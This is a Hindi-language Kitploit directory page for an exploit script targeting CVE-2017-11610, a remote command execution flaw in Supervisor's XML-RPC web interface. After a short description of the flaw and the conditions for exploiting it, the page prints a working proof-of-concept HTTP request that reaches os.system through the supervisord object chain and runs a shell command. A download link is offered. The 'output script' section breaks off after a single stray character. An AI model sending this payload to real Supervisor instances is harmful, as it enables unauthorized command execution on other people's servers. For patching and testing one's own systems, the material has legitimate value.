Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-11610 — सुपरवाइज़रड रिमोट कमांड निष्पादन भेद्यता स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/yaunsky/cve-2017-11610
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubyaunsky/cve-2017-11610

CVE-2017-11610

सुपरवाइज़रड रिमोट कमांड निष्पादन भेद्यता स्क्रिप्ट

रिपॉजिटरी देखें
4235 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Supervisord दूरस्थ कमांड निष्पादन भेद्यता स्क्रिप्ट (CVE-2017-11610)

भेद्यता परिचय

Supervisor एक प्रक्रिया प्रबंधन उपकरण है जो Python में लिखा गया है, जिसका उपयोग UNIX-like सिस्टम (Windows समर्थित नहीं) पर प्रक्रियाओं को शुरू करने, पुनः आरंभ करने (स्वचालित रूप से प्रोग्राम को पुनः आरंभ करने), और बंद करने (केवल Python प्रक्रियाओं तक सीमित नहीं) के लिए आसानी से किया जा सकता है।

Supervisor एक C/S मॉडल प्रोग्राम है, supervisord सर्वर पक्ष है, supervisorctl क्लाइंट पक्ष है। सरल शब्दों में, क्लाइंट supervisor के निर्देश इनपुट करता है और सर्वर साइड के API को कॉल करके कुछ कार्य पूरा करता है।

Supervisor की वेब सेवा का उपयोग बहुत से लोग करते हैं, यानी supervisord का क्लाइंट, जब तक रूटिंग काम कर रही है, तब दूरस्थ रूप से वेब पेज के माध्यम से supervisor के क्लाइंट के समान संचालन किया जा सकता है। वेब इंटरफेस के माध्यम से संचालन XML-RPC इंटरफेस द्वारा कार्यान्वित किया जाता है, और यह भेद्यता XML-RPC इंटरफेस द्वारा डेटा प्रसंस्करण में है।

उपयोग की शर्तें

  • Supervisor संस्करण 3.1.2 से Supervisor संस्करण 3.3.2
  • वेब सेवा सक्षम हो और पोर्ट 9001 तक पहुँचा जा सके
  • पासवर्ड कमजोर या खाली हो

POC

root@kitploit:~
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

इस POC का कोई आउटपुट नहीं है

आउटपुट (प्रतिध्वनि) स्क्रिप्ट

a

टूल डाउनलोड करें